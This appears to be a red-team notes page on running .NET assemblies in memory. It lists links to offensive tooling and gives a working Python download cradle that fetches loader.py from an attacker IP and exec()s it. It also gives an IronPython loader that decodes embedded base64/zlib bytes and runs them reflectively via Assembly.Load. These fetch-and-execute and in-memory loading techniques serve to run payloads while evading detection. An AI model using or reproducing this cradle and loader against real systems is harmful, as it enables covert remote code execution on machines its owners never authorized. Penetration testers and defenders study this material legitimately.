.NET Reflective Assembly

https://blog.king-sabri.net/red-team/executing-c-assembly-in-memory-using-assembly.load
https://pscustomobject.github.io/powershell/howto/PowerShell-Add-Assembly/
https://www.praetorian.com/blog/running-a-net-assembly-in-memory-with-meterpreter
https://github.com/S3cur3Th1sSh1t/PowerSharpPack#powersharppack
https://github.com/GhostPack/Rubeus#sidenote-running-rubeus-through-powershell
https://github.com/cfalta/PowerShellArmoury/blob/master/ConvertTo-Powershell.ps1
https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/convert_c%23_to_ps1.ps1
https://icyguider.github.io/2022/01/03/Convert-CSharp-Tools-To-PowerShell.html
https://cyberstoph.org/posts/2020/09/convertto-powershell-wrapping-applications-with-ps/

IronPython Loader

https://www.huntress.com/blog/snakes-on-a-domain-an-analysis-of-a-python-malware-loader
https://github.com/IronLanguages/ironpython3/releases
https://pythonnet.github.io/
https://github.com/BC-SECURITY/Empire/blob/master/empire/server/stagers/CSharpPy.yaml
https://github.com/BC-SECURITY/IronSharpPack

Cradle:

>>> import urllib.request
>>> request = urllib.request.Request('http://10.10.13.37/loader.py')
>>> result = urllib.request.urlopen(request)
>>> payload = result.read()
>>> exec(payload)

Payload:

loader.py

import clr
import zlib
import base64

clr.AddReference('System')
from System import *
from System.Reflection import *

b64 = base64.b64encode(zlib.decompress(base64.b64decode(b'<LOADER_BYTES_B64>'))).decode()
raw = Convert.FromBase64String(b64)

assembly = Assembly.Load(raw)
type = assembly.GetType('Loader.Program')
type.GetMethod('Main').Invoke(Activator.CreateInstance(type), None)

Last updated 4 months ago

hashtagIronPython Loader

IronPython Loader